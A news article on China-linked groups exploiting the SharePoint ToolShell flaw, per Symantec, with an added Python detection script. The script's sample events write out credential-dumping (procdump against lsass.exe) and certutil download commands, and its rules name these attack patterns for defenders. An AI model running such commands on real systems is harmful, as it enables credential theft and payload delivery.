Hackers believed to be linked to China have exploited a critical Microsoft SharePoint vulnerability known as ToolShell (CVE-2025-53770) in a series of attacks against government departments, universities, telecommunications providers and finance firms across multiple continents.
The flaw, which affects on-premises SharePoint servers, was disclosed as an actively exploited zero-day on July 20. Microsoft issued emergency updates the following day. Security researchers say ToolShell functions as a bypass for two earlier vulnerabilities (CVE-2025-49706 and CVE-2025-49704) that can be abused remotely without authentication to achieve code execution and full file-system access.
Microsoft has previously attributed exploitation of ToolShell to three China-linked threat groups known as Budworm/Linen Typhoon, Sheathminer/Violet Typhoon and Storm-2603/Warlock ransomware.
According to a new report from Broadcom-owned Symantec, exploitation is broader than was initially thought, with compromises spanning the Middle East, South America, the United States, Africa and Europe.
Symantec says it has observed activity targeting a Middle Eastern telecommunications provider that began on July 21, when attackers exploited CVE-2025-53770 to plant webshells and establish persistent access. The campaign then used DLL side-loading to deploy a Go-based backdoor dubbed Zingdoor and what researchers believe to be the ShadowPad trojan, followed by the Rust-based KrustyLoader and the Sliver post-exploitation framework.
The attackers leveraged living-off-the-land and publicly available tools, including credential dumping via ProcDump, Minidump and LsassDumper, and abuse of the PetitPotam NTLM relay attack (CVE-2021-36942) to pursue domain compromise. The threat actor also side-loaded legitimate Trend Micro and Bitdefender executables and used the Certutil utility, as well as the GoGo Scanner and the Revsocks exfiltration tool.
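For defenders, the tooling described in the two paragraphs above maps onto a handful of process-creation patterns that endpoint telemetry can surface: a known dumping utility pointed at LSASS, a minidump-style command line naming LSASS, certutil invoked with its download or decode switches, and a shell spawned by the IIS worker process that hosts SharePoint. The following Python is an added example written for this article, not code from Symantec or from the report it describes. The event schema (`host`, `parent`, `image`, `cmdline`), the `w3wp.exe`-parent heuristic, and every sample event are assumptions constructed for illustration; none is observed telemetry from the campaign.

```python
"""Toy triage pass over constructed Windows process-creation events.

Added example, not from the article or the Symantec report. It flags the
credential-dumping and certutil patterns the article names, plus a shell
spawned by the SharePoint IIS worker process (w3wp.exe), a common sign of
webshell activity. Every record in SAMPLE_EVENTS is constructed.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str      # reporting host (assumed field)
    parent: str    # parent process image name (assumed field)
    image: str     # new process image name (assumed field)
    cmdline: str   # full command line (assumed field)


# Dumping tools named in the article; compared case-insensitively.
DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "lsassdumper.exe"}

# Real certutil switches commonly repurposed to fetch or decode payloads.
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)

# ProcDump's full-dump switch (-ma) or the word "minidump", as a standalone token.
MINIDUMP_SWITCH = re.compile(r"(?:^|\s)-ma(?:\s|$)|minidump")

# Shells that should not normally be children of the IIS worker process.
SHELLS = {"cmd.exe", "powershell.exe"}


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of pattern tags that match one event (empty if benign)."""
    findings: list[str] = []
    image = ev.image.lower()
    cmd = ev.cmdline.lower()

    # 1) A known dumping tool with LSASS on its command line.
    if image in DUMP_TOOLS and "lsass" in cmd:
        findings.append("lsass-dump-tool")

    # 2) Any process combining LSASS with a minidump-style switch or keyword.
    if "lsass" in cmd and MINIDUMP_SWITCH.search(cmd):
        findings.append("lsass-minidump-cmdline")

    # 3) certutil used as a downloader or decoder rather than for cert work.
    if image == "certutil.exe" and CERTUTIL_ABUSE.search(ev.cmdline):
        findings.append("certutil-download-or-decode")

    # 4) The SharePoint/IIS worker process spawning an interactive shell.
    if ev.parent.lower() == "w3wp.exe" and image in SHELLS:
        findings.append("w3wp-spawned-shell")

    return findings


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """Run classify() over a batch; return (image, tags) for flagged events only."""
    return [(ev.image, tags) for ev in events if (tags := classify(ev))]


# Constructed sample telemetry (not real observations).
SAMPLE_EVENTS = [
    ProcEvent("sp-web01", "w3wp.exe", "cmd.exe", "cmd.exe /c whoami"),
    ProcEvent("sp-web01", "cmd.exe", "procdump64.exe",
              r"procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\out.dmp"),
    ProcEvent("sp-web01", "cmd.exe", "certutil.exe",
              r"certutil.exe -urlcache -split -f http://example.invalid/p.txt C:\Windows\Temp\p.txt"),
    ProcEvent("sp-web01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
    ProcEvent("sp-web01", "explorer.exe", "certutil.exe", "certutil.exe -verify cert.cer"),
]


if __name__ == "__main__":
    for image, tags in scan(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(tags)}")
```

The two benign records show the intent of the checks: `svchost.exe` never matches, and `certutil -verify` is ignored because only the download and decode switches are treated as suspicious. In production the same logic would run over Sysmon Event ID 1 or EDR process-creation data, and the `w3wp.exe` rule is the one most specific to a SharePoint webshell foothold.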
“The attackers also gained access to the networks of two government agencies in South America and a university in the U.S. recently. In these attacks, the attackers used other vulnerabilities for initial access and exploited SQL servers and Apache HTTP servers running the Adobe ColdFusion software to deliver their malware,” the researchers noted.
Symantec says that the observed campaigns indicate that ToolShell has been leveraged by more Chinese-linked groups than previously reported.
“These attacks demonstrate that the ToolShell vulnerability was being exploited by an even wider range of Chinese threat actors than was originally thought,” the cybersecurity firm said. “There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.”